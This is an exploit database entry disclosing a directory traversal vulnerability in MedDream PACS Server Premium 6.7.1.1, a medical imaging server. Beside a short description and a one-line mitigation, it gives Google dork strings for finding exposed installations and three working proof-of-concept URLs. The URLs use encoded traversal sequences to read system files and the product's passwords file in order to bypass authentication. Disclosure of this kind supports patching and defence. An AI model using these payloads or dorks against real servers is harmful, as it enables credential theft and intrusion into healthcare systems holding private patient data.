Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal

vendor:

MedDream PACS Server Premium

by:

Carlos Avila

8.8

CVSS

HIGH

Directory Traversal

CWE

Product Name: MedDream PACS Server Premium

Affected Version From: 6.7.1.1

Affected Version To: 6.7.1.1

Patch Exists: NO

Related CWE: N/A

CPE: a:softneta:meddream_pacs_server_premium:6.7.1.1

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 7

2018

Softneta MedDream PACS Server Premium 6.7.1.1 – Directory Traversal

Softneta MedDream PACS Server Premium 6.7.1.1 is vulnerable to directory traversal attacks. An attacker can exploit this vulnerability by sending a crafted HTTP request containing directory traversal sequences (e.g. '../../../../../../../../../../') to the vulnerable server. This can allow the attacker to access sensitive files and directories that are stored outside the web root folder. Additionally, the attacker can also bypass authentication and obtain private information from users and passwords.

Mitigation:

Ensure that user input is properly sanitized and validated to prevent directory traversal attacks.

Source

Exploit-DB raw data:

# Exploit Title: Softneta MedDream PACS Server Premium 6.7.1.1 - Directory Traversal
# Date: 2018-05-23
# Software Link: https://www.softneta.com/products/meddream-pacs-server/downloads.html
# Google Dork: inurl:pacs/login.php, inurl:pacsone/login.php, inurl:pacsone filetype:php home, inurl:pacsone filetype:php login
# Version: MedDream PACS Server Premium 6.7.1.1
# Category: webapps
# Tested on: Windows 7 
# Exploit Author: Carlos Avila
# Contact: http://twitter.com/badboy_nt
  
# Proof of Concept

http://TARGET/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini

http://TARGET/Pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows\System32\drivers\etc\hosts

http://TARGET/Pacs/nocache.php?path=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c\MedDreamPACS-Premium\passwords.txt (Attack Vector, obtain private information from users and passwords -Bypass Authentication- )